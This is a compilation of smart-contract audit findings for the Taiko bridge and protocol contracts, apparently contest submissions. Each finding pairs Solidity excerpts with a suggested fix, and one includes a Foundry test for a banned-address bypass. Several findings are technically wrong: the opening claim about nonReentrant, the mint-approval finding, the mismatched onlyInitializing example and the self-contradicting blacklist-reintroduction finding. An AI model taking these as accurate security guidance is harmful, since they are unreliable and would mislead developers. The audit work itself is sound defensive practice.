    function depositEtherToL2(address _recipient) external payable nonReentrant whenNotPaused {
        // Implementation...
    }
}

By adding the nonReentrant modifier to the depositEtherToL2 function, we ensure that the function cannot be re-entered while it is still executing, thus mitigating the reentrancy vulnerability.

One may ask how this is even an exploit when a modifier that prevents reentrancy is already in place.

The nonReentrant modifier from OpenZeppelin's ReentrancyGuard contract is designed to prevent reentrancy attacks by ensuring that a function cannot be re-entered while it is still executing. This modifier is typically used to protect functions that change the state of the contract and interact with external contracts, which are common targets for reentrancy attacks.

However, the nonReentrant modifier alone is not sufficient to secure the depositEtherToL2 function from all potential reentrancy attacks. The reason is that the nonReentrant modifier only prevents reentrancy after the state has been changed. If the state change occurs after the external call, and the external call triggers a reentrant call back into the function, the nonReentrant modifier will not prevent the reentrancy.

In the case of the depositEtherToL2 function, if the function sends Ether to an external contract (which could be a malicious contract) before the state change is made, and that external contract calls back into the depositEtherToL2 function, the nonReentrant modifier will not prevent the reentrancy.

To secure the function against reentrancy attacks, it is recommended to follow the Checks-Effects-Interactions pattern, which suggests that you should make any state changes in your function before calling external contracts. This way, even if a reentrant call is made, the state of the contract will have already been updated, and the reentrant call will not be able to change the state again.

Here's an example of how to apply the Checks-Effects-Interactions pattern in the depositEtherToL2 function:

function depositEtherToL2(address _recipient) external payable nonReentrant whenNotPaused {
    // Checks
    require(_recipient != address(0), "Invalid recipient");

    // Effects
    // Update the state of the contract here, before making the external call

    // Interactions
    // Make the external call here, after the state has been updated
    payable(_recipient).transfer(msg.value);
}

By ensuring that the state is updated before making the external call, you can prevent reentrancy attacks even with the nonReentrant modifier in place.

Assessed type

Reentrancy

`_invokeMessageCall` is possible on banned addresses

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L101-L112

Vulnerability details

Description

The owner or the bridge_watchdog can ban an address by calling Bridge.banAddress():

    function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }

In Bridge.processMessage(), there is a check on whether the address in the _message.to field is banned. If it is banned, the message status gets updated to DONE:

function processMessage() {
//.. code omitted
            if (
                _message.to == address(0) || _message.to == address(this)
                    || _message.to == signalService || addressBanned[_message.to]
            ) {
                refundAmount = _message.value;
                _updateMessageStatus(msgHash, Status.DONE);
            } 
//.. code omitted
}

After setting the message to status DONE, a refund will happen to either the msg.sender or the refundTo address alongside a small fee for the msg.sender.

function processMessage() {
//.. code omitted
            address refundTo =
                _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
            if (msg.sender == refundTo) {
                refundTo.sendEther(_message.fee + refundAmount);
            } else {
                msg.sender.sendEther(_message.fee);
                refundTo.sendEther(refundAmount);
            }
//.. code omitted

This means that it should not be possible to call _invokeMessageCall on a banned address, since that call is reserved for the else branch that follows the if branch where the banned-address check happens:

function processMessage() {
//.. code omitted
            if (
                _message.to == address(0) || _message.to == address(this)
                    || _message.to == signalService || addressBanned[_message.to]
            ) {
                refundAmount = _message.value;
                _updateMessageStatus(msgHash, Status.DONE);
->          } else {
                uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
                if (_invokeMessageCall(_message, msgHash, gasLimit)) {
                    _updateMessageStatus(msgHash, Status.DONE);
                } else {
                    _updateMessageStatus(msgHash, Status.RETRIABLE);
                }
            }
//.. code omitted

However, it is still possible to call _invokeMessageCall on a banned address.

Proof of Concept

Consider the following:

  • A message gets sent from src to destination
  • Message arrives at destination
  • Message becomes retriable
function processMessage() {
//.. code omitted
            } else {
                uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
                if (_invokeMessageCall(_message, msgHash, gasLimit)) {
                    _updateMessageStatus(msgHash, Status.DONE);
                } else {
->                  _updateMessageStatus(msgHash, Status.RETRIABLE);
                }
//.. code omitted
  • The address that is specified as _message.to gets banned by the bridge_watchdog:
    function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }
  • Since the _message.to got banned, it should not be possible to call _invokeMessageCall on _message.to.
  • However, this message can still be retried, and it will successfully call _invokeMessageCall because there are no checks for banned addresses in retryMessage:
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
            revert B_NON_RETRIABLE();
        }
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
        emit MessageRetried(msgHash);
    }

This results in banned addresses still being callable, which should not be the case since _invokeMessageCall is intended to be strictly prohibited from being called on banned addresses.

Tools Used

Manual Review

Recommended Mitigation Steps

Handle retryMessage() calls to banned addresses in the same way they are handled inside processMessage(), i.e. mark the message as DONE and send a refund instead of invoking the call; a sketch is shown below.
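
A minimal sketch of one possible change to the invocation branch of retryMessage() (this mirrors the refund semantics of processMessage() and assumes the same helpers are in scope):

    if (addressBanned[_message.to]) {
        // Treat a banned target the way processMessage() does: mark DONE and refund the value
        address refundTo =
            _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
        _updateMessageStatus(msgHash, Status.DONE);
        refundTo.sendEther(_message.value);
    } else if (_invokeMessageCall(_message, msgHash, gasleft())) {
        _updateMessageStatus(msgHash, Status.DONE);
    } else if (_isLastAttempt) {
        _updateMessageStatus(msgHash, Status.FAILED);
    }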

Assessed type

Timing

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

EIP3074 renders `msg.sender == tx.origin` useless

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/libs/LibAddress.sol#L77-L79

Vulnerability details

Description

Inside the function isSenderEOA(), the following check happens to ensure that the caller is an EOA:

    function isSenderEOA() internal view returns (bool) {
        return msg.sender == tx.origin;
    }

However, due to EIP-3074, this check will no longer be reliable.

This EIP will make it possible to delegate the control of an EOA to a smart contract, rendering the check msg.sender == tx.origin useless.

This means that this check:

    function proposeBlock(
        TaikoData.State storage _state,
        TaikoData.Config memory _config,
        IAddressResolver _resolver,
        bytes calldata _data,
        bytes calldata _txList
    )
    //..
            if (!LibAddress.isSenderEOA()) revert L1_PROPOSER_NOT_EOA();
	//..

will not always hold, which means that contracts could effectively propose blocks, potentially leading to unexpected results down the line.

Tools Used

Manual Review

Recommended Mitigation Steps

Do not rely on msg.sender == tx.origin to ensure the caller is an EOA; handle this in a different way (one possible direction is sketched below).
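
A minimal sketch of one possible direction, replacing the EOA heuristic with an explicit allowlist resolved via the existing address resolver (the "allowed_proposer" name and the L1_PROPOSER_NOT_ALLOWED error are hypothetical, not part of the codebase):

    // Inside proposeBlock(), instead of:
    //     if (!LibAddress.isSenderEOA()) revert L1_PROPOSER_NOT_EOA();
    // resolve an explicitly allowed proposer and check against it:
    address allowedProposer = _resolver.resolve("allowed_proposer", true);
    if (allowedProposer != address(0) && msg.sender != allowedProposer) {
        revert L1_PROPOSER_NOT_ALLOWED(); // hypothetical error
    }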

Assessed type

Context

ERC20 transfer return value is not checked in LibVerifying::verifyBlocks() function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibVerifying.sol#L189

Vulnerability details

Impact

A call to transfer() without checking the result is vulnerable to incorrect accounting. If insufficient tokens are present, no revert occurs but a result of false is returned, so it is important to check this. If the return value is not checked, the bond could be accounted as returned without the tokens actually having been transferred, so funds could be lost.

It is also a best practice to check this.

Proof of Concept

Refer to the code from the verifyBlocks() function, where the return value of transfer() is not checked.

   tko.transfer(ts.prover, bondToReturn);

Tools Used

Manual review

Recommended Mitigation Steps

Check the return value of the transfer and, if it is false, revert the transaction; a sketch is shown below.
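
A minimal sketch of the check (this assumes tko is an ERC20 whose transfer() returns bool; alternatively OpenZeppelin's SafeERC20 could be used):

    // Option 1: check the boolean return value explicitly
    if (!tko.transfer(ts.prover, bondToReturn)) revert("TKO bond transfer failed");

    // Option 2: wrap the call with SafeERC20 (assumes `using SafeERC20 for IERC20;`)
    // tko.safeTransfer(ts.prover, bondToReturn);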

Assessed type

Token-Transfer

First block after genesis may never be proposed

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L307-L316

Vulnerability details

Impact

The first block after genesis will never be proposed if the same address does not hold both the proposer_one and proposer roles. If proposer_one is unset (address(0)), then this block can be proposed only if the proposer role is also unset, or if the proposer address itself proposes the block, which is not the purpose of this role.

Proof of Concept

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/L1/libs/LibProposing.sol#L307-L316

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        address proposerOne = _resolver.resolve("proposer_one", true);
        if (proposerOne != address(0) && msg.sender != proposerOne) {
            return false;
        }
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}

Here, if the proposerOne address is correctly proposing the first block after genesis, the following condition is false:

if (proposerOne != address(0) && msg.sender != proposerOne) {

The code then checks msg.sender against the proposer role. What should instead happen is: if msg.sender is proposerOne, the function should just return true.

Tools Used

Manual.

Recommended Mitigation Steps

Update the above code block to:

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    address proposer;
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        proposer = _resolver.resolve("proposer_one", true);
    } else {
        proposer = _resolver.resolve("proposer", true);
    }

    return proposer == address(0) || msg.sender == proposer;
}

If the intention is to fall back on the proposer role when proposerOne is set to address(0), then this should be used instead:

function _isProposerPermitted(
    TaikoData.SlotB memory _slotB,
    IAddressResolver _resolver
)
    private
    view
    returns (bool)
{
    if (_slotB.numBlocks == 1) {
        // Only proposer_one can propose the first block after genesis
        address proposerOne = _resolver.resolve("proposer_one", true);
-       if (proposerOne != address(0) && msg.sender != proposerOne) {
-           return false;
+       if (proposerOne != address(0)) {
+           return msg.sender == proposerOne;
        }
    }

    address proposer = _resolver.resolve("proposer", true);
    return proposer == address(0) || msg.sender == proposer;
}

Assessed type

Access Control

QA Report

See the markdown file with the details of this report here.

No way to `changeBridgedToken()` back to an old btoken

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L181

Vulnerability details

Summary

The owner can call changeBridgedToken() to change the bridged token from btokenOld_ to _btokenNew. However, if the owner later wants to change it back to btokenOld_ (or map btokenOld_ to another canonical _ctoken), there is no way to do so, as the call to changeBridgedToken() will revert. This is because btokenOld_ is now blacklisted and no function exists that allows whitelisting it again.

Vulnerability Details

Whenever changeBridgedToken() is called, it blacklists the old bridged token, btokenOld_. This, coupled with the fact that there is no function inside the protocol which lets the owner remove a token from the blacklist, makes it impossible to ever call changeBridgedToken() again with btokenOld_ as the new bridged token, since the call will always revert on L162:

  File: contracts/tokenvault/ERC20Vault.sol

  144:              /// @notice Change bridged token.
  145:              /// @param _ctoken The canonical token.
  146:              /// @param _btokenNew The new bridged token address.
  147:              /// @return btokenOld_ The old bridged token address.
  148:              function changeBridgedToken(
  149:                  CanonicalERC20 calldata _ctoken,
  150:                  address _btokenNew
  151:              )
  152:                  external
  153:                  nonReentrant
  154:                  whenNotPaused
  155:                  onlyOwner
  156:                  returns (address btokenOld_)
  157:              {
  158:                  if (_btokenNew == address(0) || bridgedToCanonical[_btokenNew].addr != address(0)) {
  159:                      revert VAULT_INVALID_NEW_BTOKEN();
  160:                  }
  161:
  162: @--->            if (btokenBlacklist[_btokenNew]) revert VAULT_BTOKEN_BLACKLISTED();
  163:
  164:                  if (IBridgedERC20(_btokenNew).owner() != owner()) {
  165:                      revert VAULT_NOT_SAME_OWNER();
  166:                  }
  167:
  168:                  btokenOld_ = canonicalToBridged[_ctoken.chainId][_ctoken.addr];
  169:
  170:                  if (btokenOld_ != address(0)) {
  171:                      CanonicalERC20 memory ctoken = bridgedToCanonical[btokenOld_];
  172:
  173:                      // The ctoken must match the saved one.
  174:                      if (
  175:                          ctoken.decimals != _ctoken.decimals
  176:                              || keccak256(bytes(ctoken.symbol)) != keccak256(bytes(_ctoken.symbol))
  177:                              || keccak256(bytes(ctoken.name)) != keccak256(bytes(_ctoken.name))
  178:                      ) revert VAULT_CTOKEN_MISMATCH();
  179:
  180:                      delete bridgedToCanonical[btokenOld_]; 
  181: @--->                btokenBlacklist[btokenOld_] = true;
  182:
  183:                      // Start the migration
  184:                      IBridgedERC20(btokenOld_).changeMigrationStatus(_btokenNew, false);
  185:                      IBridgedERC20(_btokenNew).changeMigrationStatus(btokenOld_, true);
  186:                  }

Tools Used

Manual review

Recommended Mitigation Steps

Add a function with the onlyOwner modifier which allows whitelisting of a token if the owner so wishes. The owner can then call this function prior to calling changeBridgedToken() and avoid a revert; a sketch is shown below.
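
A minimal sketch of such a function (the function name and event are illustrative, not from the existing codebase; btokenBlacklist is the existing mapping in ERC20Vault):

    /// @notice Add or remove a bridged token from the blacklist.
    function setBtokenBlacklist(address _btoken, bool _blacklisted) external onlyOwner {
        btokenBlacklist[_btoken] = _blacklisted;
        emit BtokenBlacklistUpdated(_btoken, _blacklisted); // hypothetical event
    }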

Assessed type

Other

Relayer fee unrefunded in recallMessage()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/bridge/Bridge.sol#L138-L139
https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/bridge/Bridge.sol#L206

Vulnerability details

Impact

When Bridge.recallMessage() is called on a failed message on its source chain, the associated assets should be released back to the original caller, but the relayer fee is not included.

So when a user indicated an interest in using a relayer and paid the associated relayer fee with the sendMessage() call, that fee is not released back on recallMessage() if the message failed.

Users using a relayer will lose an amount equal to _message.fee.

Proof of Concept

        // value to invoke on the destination chain.
        uint256 value;
 @>>    // Processing fee for the relayer. Zero if owner will process themself.
        uint256 fee;

The user initially sent value + fee:

 // Ensure the sent value matches the expected amount.
        uint256 expectedAmount = _message.value + _message.fee;

Refunding without considering the fee:

            } else {
                _message.srcOwner.sendEther(_message.value); 
            }

Tools Used

Manual review.

Recommended Mitigation Steps

            } else {
                _message.srcOwner.sendEther(_message.value + _message.fee); 
            }

Assessed type

Error

Absence of an approval check before invoking the external mint function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/tokenvault/BridgedERC20Base.sol#L75-L86

Vulnerability details

Impact

The lack of an approval check before invoking the external mint function could result in unauthorized token creation. Without proper approval, users could have tokens minted on their behalf without their explicit consent, potentially leading to unexpected token balances and loss of user funds.

Proof of Concept

The burn function in the BridgedERC20Base contract invokes the mint function of an external contract (IBridgedERC20) without performing an approval check. This vulnerability arises from the following line of code:

IBridgedERC20(migratingAddress).mint(_account, _amount);

Here, migratingAddress represents the address of the external contract (IBridgedERC20), and the function is invoked without performing any checks or validations. The contract directly calls the mint function of IBridgedERC20 to mint tokens for a user (_account) without verifying whether the user has approved the contract to act on their tokens. This lack of an approval check means that tokens can be minted for users without their consent or explicit authorization.

Tools Used

Manual

Recommended Mitigation Steps

Implement an approval check before calling the mint function of the external contract. Before minting tokens for a user, ensure that the user has approved the contract to spend their tokens using the approve function.

Assessed type

Other

Breaking EIP-1967 pattern: Storage slot may collide unintentionally with variable storage slot, due to using direct hashed result.

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/common/EssentialContract.sol#L17-L18
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L23-L24
https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/signal/SignalService.sol#L203

Vulnerability details

Impact

A storage slot may collide unintentionally with a variable's storage slot because the slot constant is the direct keccak256 hash of a string. This means that if a contract's variables happen to land on that storage slot number, their values will collide directly with the defined slots, leading to corrupt storage values which can easily break the protocol.

This also breaks the EIP-1967 proxy pattern, which always subtracts 1 from the hashed value (see https://eips.ethereum.org/EIPS/eip-1967).

Proof of Concept

In Bridge.sol and EssentialContract.sol, the pre-defined storage slot locations are direct keccak256 hash values of a string. This means a pre-image of the hash value is known, which can be used to create a storage collision, the worst possible scenario for any contract.

Even though it may be unlikely that storage variables end up at the particular slot number that leads to a collision, the fact that a storage collision is so critical makes this issue severe. If we look at the standard EIP-1967 recommendation, the storage slots are always keccak256('some string') - 1. The -1 ensures that there is no known pre-image of the final slot value, preventing any (computable) possibility of storage collision.

Tools Used

Manual Review

Recommended Mitigation Steps

  • Subtract 1 from the slot value (including in the getSignalSlot function), as specified by the EIP-1967 standard; a sketch is shown below.
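
A minimal sketch of the adjusted slot derivation (the string and constant name mirror the existing pattern but are illustrative; the exact values in the codebase may differ):

    // EIP-1967 style: hash minus 1, so no pre-image of the final slot value is known
    bytes32 private constant _REENTRY_SLOT =
        bytes32(uint256(keccak256("EssentialContract.reentry_slot")) - 1);

    // The same -1 adjustment can be applied to the value computed in getSignalSlot().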

Assessed type

Other

Banned address can still `_invokeMessageCall()` by calling `retryMessage()`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L331-L332

Vulnerability details

Summary & Impact

The function banAddress() can be used by the owner to ban or unban an address. As the natspec mentions:

  File: contracts/bridge/Bridge.sol

  97:  @--->        /// @notice Ban or unban an address. A banned addresses will not be invoked upon
  98:  @--->        /// with message calls.
  99:               /// @param _addr The address to ban or unban.
  100:              /// @param _ban True if ban, false if unban.
  101:              function banAddress(

However, a user can bypass this and invoke a message via retryMessage(), which has no check in place for banned addresses.

Root Cause

The banned address check currently exists only within processMessage() and hence the check never occurs while retrying a message.

Details

Consider the following flow of events:

  • Alice calls processMessage() but the internal call to _invokeMessageCall() fails and the message status is set as RETRIABLE on L285.
  • Owner calls banAddress() to ban Alice's message.to address.
  • Alice calls retryMessage(). Her message gets processed and a call to _invokeMessageCall() is made since the function never checks for banned addresses. This should not have happened. Instead, it should have been directly marked DONE and the _message.value refunded.

Proof of Concept

Add the following test inside protocol/test/bridge/Bridge.t.sol and run via forge test -vv --mt test_t0x1c_Bridge_retry_message_with_banned_address to see it pass, even though it should have failed as per specs:

    function test_t0x1c_Bridge_retry_message_with_banned_address() public {
        vm.startPrank(Alice);
        (IBridge.Message memory message, bytes memory proof) =
            setUpPredefinedSuccessfulProcessMessageCall();

        // etch bad receiver at the to address, so it fails.
        vm.etch(message.to, address(badReceiver).code);

        bytes32 msgHash = destChainBridge.hashMessage(message);

        destChainBridge.processMessage(message, proof);

        IBridge.Status status = destChainBridge.messageStatus(msgHash);

        assertEq(status == IBridge.Status.RETRIABLE, true);

        // ban `message.to`
        destChainBridge.banAddress(message.to, true);

        vm.stopPrank();

        vm.prank(message.destOwner);
        destChainBridge.retryMessage(message, true); 
        IBridge.Status postRetryStatus = destChainBridge.messageStatus(msgHash);
        assertEq(postRetryStatus == IBridge.Status.FAILED, true);  // @audit : should have been marked as DONE and refund issued
    }

Tools Used

Foundry

Recommended Mitigation Steps

  • Add the banned address check inside retryMessage()
  • Issue a refund when applicable
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        // If the gasLimit is set to 0 or isLastAttempt is true, the caller must
        // be the message.destOwner.
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }

        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
            revert B_NON_RETRIABLE();
        }

+     if (!addressBanned[_message.to]) {
        // Attempt to invoke the messageCall.
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
+     } else {
+       uint256 refundAmount = _message.value;
+       address refundTo = _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
+       _updateMessageStatus(msgHash, Status.DONE);
+       refundTo.sendEther(refundAmount);
+     }
      emit MessageRetried(msgHash);
    }

Assessed type

Invalid Validation

Missing onlyInitializing modifier in __Essential_init()

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/common/EssentialContract.sol#L109

Vulnerability details

Impact

Skipping the onlyInitializing modifier, even if the function is only called from a function protected by the initializer modifier, may pose a threat to the system.

Proof of Concept

function init(address _owner, address _addressManager) external initializer {
    __Essential_init(_owner, _addressManager);
}

function __Essential_init(address _owner) internal virtual {
    _transferOwnership(_owner == address(0) ? msg.sender : _owner);
    __paused = _FALSE;
}

Tools Used

manual

Recommended Mitigation Steps

Add the onlyInitializing modifier to __Essential_init(); a sketch is shown below.
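
A sketch of the fix, adding the modifier to the internal initializer:

    function __Essential_init(address _owner) internal virtual onlyInitializing {
        _transferOwnership(_owner == address(0) ? msg.sender : _owner);
        __paused = _FALSE;
    }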

Assessed type

Upgradable

Missing return value of `staticcall` inside `RsaVerify.sol` leads to stale data

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/automata-attestation/utils/RsaVerify.sol#L99-L110
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/automata-attestation/utils/RsaVerify.sol#L247-L258

Vulnerability details

Description

In the library RsaVerify.sol, the function pkcs1Sha256 is used to verify a PKCSv1.5 SHA256 signature:

    function pkcs1Sha256(
        bytes32 _sha256,
        bytes memory _s,
        bytes memory _e,
        bytes memory _m
    )
        internal
        view
        returns (bool)
    {
//.. code omitted
}

Another function in RsaVerify.sol, which verifies a PKCSv1.5 SHA1 signature, is the function pkcs1Sha1:

    function pkcs1Sha1(
        bytes20 _sha1,
        bytes memory _s,
        bytes memory _e,
        bytes memory _m
    )
        internal
        view
        returns (bool)
    {
//.. code omitted
}

Both these functions use the same assembly block to make a staticcall:

        assembly {
            pop(
                staticcall(
                    sub(gas(), 2000),
                    5,
                    add(input, 0x20),
                    inputlen,
                    add(decipher, 0x20),
                    decipherlen
                )
            )
        }

The gas forwarded to the staticcall is calculated by sub(gas(), 2000).
However, if the staticcall fails, for example because there is not enough gas left to execute it, the execution of pkcs1Sha256() or pkcs1Sha1() will continue, because the return value of the staticcall is popped and never checked for being 0.

Both pkcs1Sha256 and pkcs1Sha1 are either directly or indirectly called inside:

  • SigVerifyLib.verifyRS256Signature
  • SigVerifyLib.verifyRS1Signature
  • SigVerifyLib.verifyCertificateSignature
  • SigVerifyLib.verifyAttStmtSignature

This means that signatures may be wrongfully validated or wrongfully invalidated based on stale decipher data, which impacts the system's core workings, since signature validation is one of its key building blocks.

Tools Used

Manual Review

Recommended Mitigation Steps

Add a check that requires the return value of the staticcall to be true; a sketch is shown below.
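
A minimal sketch of the check (variable names are illustrative): the success flag of the staticcall to the modexp precompile at address 0x05 is captured and checked instead of being popped.

    bool success;
    assembly {
        success :=
            staticcall(
                sub(gas(), 2000),
                5,
                add(input, 0x20),
                inputlen,
                add(decipher, 0x20),
                decipherlen
            )
    }
    if (!success) return false; // or revert, depending on the desired behavior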

Assessed type

Context

"Reintroduction of Previously Blacklisted Tokens via changeBridgedToken Function"

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/tokenvault/ERC20Vault.sol#L145-L200

Vulnerability details

Specifically, the vulnerability is not directly present in a single line of code but rather in the overall logic and flow of the function. The function attempts to prevent blacklisted tokens from being added by checking whether _btokenNew exists in bridgedToCanonical. However, this check is not effective if _btokenNew was once part of bridgedToCanonical, was removed and blacklisted, and its corresponding record in bridgedToCanonical[] was later deleted for any reason. This scenario is not directly addressed in the function's logic, leading to the vulnerability.

Impact

The vulnerability in the changeBridgedToken function within the ERC20Vault.sol contract poses a significant risk to the security and integrity of the system. By allowing the reintroduction of previously blacklisted tokens without a comprehensive historical check, the contract owner could potentially introduce a compromised or maliciously functioning token back into the system. This could lead to unauthorized access, loss of funds, or other security breaches, undermining the trust and reliability of the system.

The vulnerability lies in the lack of a historical check against previously blacklisted addresses or deprecated contracts. The current implementation only checks if the new bridged token address is blacklisted at the time of the change. However, if a token was previously blacklisted, removed from the blacklist, and then its corresponding record in bridgedToCanonical[] is deleted, the system would not prevent its reintroduction.

Here's a conceptual demonstration of how this could be exploited:

  1. Initial Blacklisting: A token is blacklisted due to security concerns.
  2. Removal and Reintroduction: The token is removed from the blacklist and later reintroduced into the system.
  3. Exploitation: The changeBridgedToken function allows the reintroduction of the previously blacklisted token without a historical check, potentially introducing a compromised version of the token.

Tools Used

  • Solidity Compiler (0.8.24)
  • Remix IDE for Solidity

Recommended Mitigation Steps

To mitigate this vulnerability, the contract should be modified to include a comprehensive historical check against previously blacklisted addresses or deprecated contracts. This could involve maintaining a separate mapping or list that tracks the history of blacklisted tokens, ensuring that a token cannot be reintroduced without explicit approval and verification of its current status.

Here's a conceptual example of how this could be implemented:

mapping(address => bool) public tokenBlacklistHistory;

function changeBridgedToken(
    CanonicalERC20 calldata _ctoken,
    address _btokenNew
)
    external
    nonReentrant
    whenNotPaused
    onlyOwner
    returns (address btokenOld_)
{
    require(_btokenNew != address(0), "Invalid new bridged token address");
    require(bridgedToCanonical[_btokenNew].addr == address(0), "New bridged token address already in use");
    require(!btokenBlacklist[_btokenNew], "New bridged token is blacklisted");
    require(!tokenBlacklistHistory[_btokenNew], "New bridged token was previously blacklisted");

    // Existing logic to change the bridged token...
}

This modification ensures that a previously blacklisted token cannot be reintroduced without explicit approval and verification of its current status, significantly reducing the risk of introducing a compromised token into the system.

Assessed type

Access Control
